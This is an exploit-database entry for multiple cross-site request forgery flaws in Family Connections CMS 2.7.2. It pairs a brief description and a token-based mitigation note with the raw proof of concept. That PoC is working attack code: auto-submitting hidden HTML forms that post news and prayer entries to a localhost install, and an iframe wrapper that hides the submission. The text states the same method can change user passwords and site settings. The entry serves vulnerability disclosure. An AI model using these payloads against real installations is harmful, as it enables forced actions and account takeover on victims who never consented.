header-logo
Suggest Exploit
vendor:
FCMS_2.7.2
by:
Ahmed Elhady Mohamed
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: FCMS_2.7.2
Affected Version From: 2.7.2002
Affected Version To: 2.7.2002
Patch Exists: NO
Related CWE: N/A
CPE: FCMS_2.7.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Sp2 En
2020

FCMS_2.7.2 cms and earlier multiple CSRF Vulnerability

This vulnerability allows a malicious hacker to change password of a user and also it allows changing the website information. First, the attacker must install all optional sections during installation process. There are CSRF in all sections in this application, for example, the attacker can add news, pray for, change the password and can do all functionalities are there. The attacker can save the exploit code in a file called 'code.html' and then call it from another page using an iframe.

Mitigation:

The application should use a random token for each request and validate it on the server side. The application should also use a secure flag for cookies and use HTTPS for all requests.
Source

Exploit-DB raw data:

FCMS_2.7.2 cms and earlier multiple CSRF Vulnerability
===================================================================================
# Exploit Title: FCMS_2.7.2 cms multiple CSRF Vulnerability

Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download

# Author: Ahmed Elhady Mohamed

#version : 2.7.2

# Category:: webapps

# Tested on: windows XP Sp2 En

# This vulnerability allows a malicious hacker to change password of a user
and also it allows changing the website information.
===================================================================================



#First we must install all optional sections during installation process.
      
#there are csrf in all sections in this application for examples you can add news , pray for , 
change the password and can do all functionalities are there.
	
#here are some examples for prove of concept
	

#########################################exploit code for Page "familynews.php"################################################	
	
	#Save the following codr in a file called "code.html"

		<html>
			<head>
				<script type="text/javascript">
					function autosubmit() {
						document.getElementById('ChangeSubmit').submit();
					}	
				</script>
			</head>
			<body  onLoad="autosubmit()">
				<form method="POST"  action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/familynews.php"  id="ChangeSubmit">
					<input type="hidden"  name="title"  value="test" />
					<input type="hidden"  name="submitadd"  value="Add" />
					<input type="hidden"  name="post"  value="testcsrf" />
					<input type="submit" value="submit"/>
				</form>
			</body>
		</html>


	
	#then i called "code.html" from another page 

	<html>
		<body>
			<iframe  src="code.html" onLoad=""></iframe>
		</body>
	</html>


###########################################exploit code for Page "prayers.php" #################################################### 
	
	#Save the following code in a file called "code.html"
	<html>
		<head>
			<script type="text/javascript">
				function autosubmit() {	
					document.getElementById('ChangeSubmit').submit();
				}	
			</script>
		</head>
		<body  onLoad="autosubmit()">
			<form method="POST"  action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit">
				<input type="hidden"  name="for"  value="test" />
				<input type="hidden"  name="submitadd"  value="Add" />
				<input type="hidden"  name="desc"  value="testtest" />
				<input type="submit" value="submit"/>
			</form>
		
		</body>
	</html>
	
	#then i called "code.html" from another page 

	<html>
		<body>
			<iframe  src="code.html" onLoad=""></iframe>
		</body>
	</html>


  	##############################################################################################################################